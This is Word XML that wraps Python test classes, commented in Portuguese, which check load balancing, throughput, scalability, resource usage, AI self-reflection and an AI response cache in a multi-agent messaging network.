    <w:p w14:paraId="63A18D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tasks = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B03F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i in range(20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8685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task = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF8F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"id": f"task_{i}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4820E2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"type": "data_processing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ADF4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"data": {"value": i}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A26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AFB64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tasks.append(task)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B8F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D022C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Distribuir tarefas (simulado)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777494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task_distribution = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6003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i, task in enumerate(tasks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474E9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agent_index = i % len(agents)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CC7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agent_id = agents[agent_index].agent_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F15A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1A3148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agent_id not in task_distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA483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task_distribution[agent_id] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155FC6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task_distribution[agent_id] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164FF8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14ED7C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# Enviar tarefa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA1A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agents[agent_index].send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556BC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agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9672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MessageType.REQUEST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2F5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{"task_data": task}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B8DA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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992E3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31C01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asyncio.sleep(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478E8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D7EEE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Verificar distribuição</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799626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distribution_variance = statistics.variance(task_distribution.values())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10493E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is_balanced = distribution_variance &lt; 2.0  # Threshold para balanceamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE7B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62DE9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6A68B4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DDFC6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1CD74E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0AFE51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test_name="Load Balancing Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59866C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test_category="coordination",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F6D9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status="passed" if is_balanced else "failed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE83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2AF4A7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CEFB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"agents_count": len(agents),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D893E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"tasks_count": len(tasks),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25396C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"task_distribution": task_distribution,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F1E9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"distribution_variance": distribution_variance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A95C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"is_balanced": is_balanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61546E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F128E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05FE51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896F5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 de balanceamento passou em {duration_ms:.2f}ms")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224E8F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ADA6E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68BFC6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20368B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678A23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397601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test_name="Load Balancing Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3487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test_category="coordination",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4913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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177200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0B7947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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BF4D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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340D14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74D077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C877B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Teste de balanceamento falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749A7D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5D6FF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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423E9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C5AAFC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A3D70EB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5221CC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PerformanceTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD32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"""Tester para performance e escalabilidade"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108629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60130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__init__(self, network: MultiAgentNetwork):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0D7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self.network = network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136519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self.test_results: List[TestResult] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289DAD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427BA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test_throughput(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C29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"""Testa throughput da rede"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E9B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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B877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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1B0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69B0C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453044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Criar agentes para teste de throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C802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sender = OptimizationAgent("throughput_sender", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D59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receiver = DataAgent("throughput_receiver", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E307F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58B30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self.network.add_agent(sender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1E2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self.network.add_agent(receiver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540D40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B6FEB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asyncio.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9F04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26A6E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Enviar múltiplas mensagens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E31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message_count = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6384A7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messages_sent = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A0B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37541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i in range(message_count):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D52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sender.send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567F2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receiver.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD12C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MessageType.REQUEST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0ED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{"message_id": i, "data": f"test_data_{i}"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BEFE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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183075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messages_sent += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629A8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72093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asyncio.sleep(5)  # Aguardar processamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D0F9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70DF6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7DB6E3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throughput = messages_sent / (duration_ms / 1000)  # mensagens por segundo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3012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B326C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287544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35D276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test_name="Throughput Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661486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test_category="performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6BB6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status="passed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CC8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1BBEFB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D426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"messages_sent": messages_sent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCBDC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"throughput_msg_per_sec": throughput,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDB1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"avg_latency_ms": duration_ms / messages_sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E237B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023833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412069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38687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 de throughput: {throughput:.2f} msg/s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10EC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357F6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2085D6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499572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0546AF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03C5B9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test_name="Throughput Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536949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test_category="performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947A8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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1174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41A7D3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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71E5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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5273C2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3DF6C0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E3318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Teste de throughput falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493830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BB4A8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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9EC4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7FF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1C3F42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test_scalability(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F3A2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"""Testa escalabilidade da rede"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8EA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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44C7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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B719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55F0E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3AB95C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Testar com diferentes números de agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427A3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agent_counts = [5, 10, 20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA65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scalability_results = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371085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FEBB2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count in agent_counts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603AC5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# Criar agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB40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agents = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B82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DataAgent(f"scale_test_{count}_{i}", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF11A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for i in range(count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA524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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B36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612096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agent in agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D42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self.network.add_agent(agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75634E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7DBBB7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await asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2570BE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714089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# Medir performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D5A6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test_start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465649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7748AC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# Enviar mensagens entre agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF5A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i in range(min(50, count * 2)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14383B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sender_idx = i % count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C581C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receiver_idx = (i + 1) % count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5589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4B96AF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agents[sender_idx].send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECE7E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agents[receiver_idx].agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2E4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MessageType.REQUEST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6CB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{"test_message": i}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF52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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74CB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71B122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await asyncio.sleep(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337C0F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396B6C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test_duration = time.time() - test_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693FA3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scalability_results[count] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496134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"duration_ms": test_duration * 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B75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"agents_count": count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05727A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"messages_per_agent": min(50, count * 2) / count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0DA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342BA6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98F73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# Remover agentes para próximo teste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4764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agent in agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8DA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self.network.remove_agent(agent.agent_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1B5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4C6AF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6534C8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50A26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Analisar escalabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6185AE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durations = [result["duration_ms"] for result in scalability_results.values()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60810C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is_scalable = all(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4C4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durations[i] &lt;= durations[i-1] * 2  # Não deve dobrar o tempo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D8D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i in range(1, len(durations))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D16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3E84F1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D35EF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692CF9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7D6AF7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test_name="Scalability Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA825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test_category="performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA175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status="passed" if is_scalable else "failed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936E7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7A5C46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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE53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"scalability_results": scalability_results,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC52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"is_scalable": is_scalable,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C74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"max_agents_tested": max(agent_counts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65906F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124EE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30ED5A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CAB1B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 de escalabilidade: {'Passou' if is_scalable else 'Falhou'}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5BC1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A1064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21FC9B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72D37D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367FDF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62B857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test_name="Scalability Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FA94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test_category="performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2360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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644209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5477FA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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4C1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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D20D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505E5F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F7B8D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Teste de escalabilidade falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9EB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BBCEA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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198041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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AD0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F02AF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test_resource_usage(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504EA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"""Testa uso de recursos do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC45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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E842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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505285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8D258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08882D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Medir recursos antes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4C5E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process = psutil.Process()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD022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initial_memory = process.memory_info().rss / 1024 / 1024  # MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA9A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initial_cpu = process.cpu_percent()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B73F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7FA9A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Criar múltiplos agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24063D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agents = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B79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OptimizationAgent(f"resource_test_{i}", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2720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i in range(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24142C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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FECC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DFC41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agent in agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417934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self.network.add_agent(agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC70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6B01C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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E4A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9B061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Simular carga de trabalho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8680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i in range(100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1901D1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agent_idx = i % len(agents)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C244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agents[agent_idx].send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C304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agents[(agent_idx + 1) % len(agents)].agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C815A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MessageType.REQUEST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797005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{"workload": i, "data": "x" * 1000}  # 1KB de dados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A0CD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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F22D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DC9E4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asyncio.sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E5C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47BFA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Medir recursos depois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335500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final_memory = process.memory_info().rss / 1024 / 1024  # MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0BA7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final_cpu = process.cpu_percent()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16CE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F0416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memory_increase = final_memory - initial_memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF2A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cpu_increase = final_cpu - initial_cpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744526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BEBC5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3F0E2D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DEC68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Verificar se uso de recursos está dentro de limites aceitáveis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1166FB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memory_ok = memory_increase &lt; 100  # Menos de 100MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C15D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cpu_ok = cpu_increase &lt; 50  # Menos de 50% CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3331B6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53C54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469270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7AE70A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test_name="Resource Usage Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7E3C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test_category="performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DB91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status="passed" if (memory_ok and cpu_ok) else "failed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C21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32490E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEFE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"initial_memory_mb": initial_memory,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F633C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"final_memory_mb": final_memory,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08FE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"memory_increase_mb": memory_increase,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0B6D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"initial_cpu_percent": initial_cpu,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6EAB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"final_cpu_percent": final_cpu,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C481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"cpu_increase_percent": cpu_increase,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179E41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"agents_created": len(agents),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D370A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"messages_sent": 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338E4E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56052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0B42F1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22A25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 de recursos: Mem</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ria +{memory_increase:.1f}MB, CPU +{cpu_increase:.1f}%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E32D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76435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1A5440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2D4A26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10AFDA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454C9A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test_name="Resource Usage Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C899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test_category="performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A34A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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6385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23F66E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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40016F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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121569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5A7A54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208FE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Teste de recursos falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0DF2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824B1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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD25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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1324A39A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA50756" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79176E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AIEvolutionTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7BC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"""Tester para auto-evolução com IA"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4518D8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530A3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__init__(self, network: MultiAgentNetwork):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C99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self.network = network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C577F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self.test_results: List[TestResult] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C908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12675A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test_ai_reflection(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220DEF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"""Testa capacidade de auto-reflexão da IA"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBAD5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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A25C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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C754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E144D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1BFFF7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Criar agente com IA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CDF7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ai_agent = AIOptimizationAgent("ai_reflection_test", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A183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self.network.add_agent(ai_agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D5F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BC763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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B352E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239A3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Simular dados de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584925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performance_data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093255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"response_time_avg": 150.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B12B9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"success_rate": 0.92,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48725B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"throughput": 25.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CCB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"error_rate": 0.08,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455F1B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"memory_usage": 45.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA220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"cpu_usage": 35.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C9A7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D3C5C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FB7A0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Solicitar análise de auto-reflexão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42965F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analysis_result = await ai_agent.reflection_engine.analyze_agent_code(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD28A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"# Sample agent code for testing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311DEA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performance_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B290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5464E4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D95A6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3126EC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D5154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Verificar se análise foi bem-sucedida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742675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has_improvements = len(analysis_result.improvement_suggestions) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026551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has_predictions = len(analysis_result.performance_predictions) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040417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confidence_ok = analysis_result.confidence_score &gt; 0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08A0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200EC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586CC9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606F0E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test_name="AI Reflection Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8868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test_category="ai_evolution",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2568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status="passed" if (has_improvements and has_predictions and confidence_ok) else "failed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69212F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393821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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3967A2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"analysis_id": analysis_result.analysis_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C18B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"improvements_count": len(analysis_result.improvement_suggestions),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A89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"predictions_count": len(analysis_result.performance_predictions),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3C78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"confidence_score": analysis_result.confidence_score,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD977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"tokens_used": analysis_result.tokens_used,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC8AB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"cost_usd": analysis_result.cost_usd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4673D1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643FE3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021865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CF3F3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 de reflex</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o IA: {len(analysis_result.improvement_suggestions)} melhorias sugeridas")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D700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43FB2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6AA036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1F655E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0EDCBB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451C79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test_name="AI Reflection Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707072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test_category="ai_evolution",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F725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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386878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1AE39E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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931DF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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794FD9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075A9F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A9322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Teste de reflex</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o IA falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A0F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64A85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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD8D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C06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B3CC7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test_ai_cache_performance(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B79C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"""Testa performance do cache de IA"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB19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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE4B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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9952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10795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5AF266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Criar cache de IA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204647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ai_cache = AICache()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E14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9DD38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Testar cache miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DBAA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cache_miss_start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041712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result_miss = ai_cache.get("test_prompt", "gpt-3.5-turbo", 0.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E72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cache_miss_time = (time.time() - cache_miss_start) * 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F26BF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C8F23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Armazenar no cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5642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test_response = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3C94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"response": "Test AI response",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712233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"tokens": 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482855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"cost": 0.001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75EE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D599F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ai_cache.set("test_prompt", "gpt-3.5-turbo", 0.7, test_response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D5E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76292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Testar cache hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9697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cache_hit_start = time.time()</w:t>
